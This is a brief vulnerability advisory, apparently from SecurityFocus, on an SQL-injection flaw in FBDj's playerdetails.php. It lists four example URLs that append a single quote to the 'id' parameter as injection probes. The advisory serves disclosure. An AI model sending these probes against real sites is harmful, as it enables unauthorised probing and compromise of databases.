13 lines
No EOL
577 B
Text
13 lines
No EOL
577 B
Text
source: https://www.securityfocus.com/bid/55504/info
|
|
|
|
FBDj is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/stats/playerdetails.php?id=5'
|
|
|
|
http://www.example.com/warstats/playerdetails.php?id=13'
|
|
|
|
http://www.example.com/playerdetails.php?id=9'
|
|
|
|
http://www.example.com/il2-stats/playerdetails.php?id=29' |